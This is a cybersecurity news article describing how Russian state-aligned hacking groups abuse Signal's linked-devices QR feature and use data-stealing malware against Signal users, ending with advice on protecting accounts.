Russian state-aligned hackers have been targeting Signal Messenger accounts, focusing on military personnel, politicians, journalists, and activists. These efforts, driven by wartime intelligence following the invasion of Ukraine, aim to infiltrate encrypted conversations and extract sensitive information.
Secure messaging applications, especially Signal, have long been a refuge for individuals seeking privacy in their communication but are also the prime target of state-run threat actors. In this campaign, researchers observed that the attackers had adopted sophisticated techniques, including phishing schemes and malware, to compromise accounts and gain persistent access to victims’ messages.
Researchers have observed a key tactic in these attacks: the abuse of Signal’s ‘linked devices’ feature, which allows users to connect multiple devices to their account via a QR code. These QR codes were sent in the guise of group invites or security alerts. When the victim scans these codes, they link the victim’s account to an attacker-controlled device, enabling real-time eavesdropping.
UNC5792, one of the several Russian-aligned threat actors, was discovered using fake Signal group invitations to compromise accounts. Another group, UNC4221, deployed a sophisticated phishing kit to imitate the Ukrainian military’s Kropyva artillery guidance app. This kit embeds malicious QR codes into fake security alerts and invites, tricking users into linking their accounts to adversary-controlled devices.
Furthermore, researchers have observed UNC4221 using the JavaScript-based PINPOINT payload to gather geolocation and other user data.
Experts also discovered that beyond remote phishing, Russian and Belarusian cyber actors have been developing malware to steal Signal database files directly from Android and Windows devices:
- APT44 (Sandworm/Seashell Blizzard): Uses the Wavesign script to extract Signal messages from Windows devices.
- Infamous Chisel (Sandworm-linked malware): Searches for Signal database files on Android devices.
- Turla (FSB-affiliated): Employs PowerShell scripts to steal messages from Signal Desktop.
- UNC1151 (Belarus-linked): Uses the Robocopy utility to stage Signal Desktop data for exfiltration.
Cyber security professionals have advised individuals to use a strong, alphanumeric password to lock mobile devices, update operating systems and apps regularly, ensure Google Play Protect is enabled, enable two-factor authentication, and be cautious of scanning any random QR code.
“This threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months,” researchers warned.
A few days ago, Elon Musk-owned X started to block links to Signal.me citing safety concerns.
In the News: Raymond reports cybersecurity incident impacting IT assets
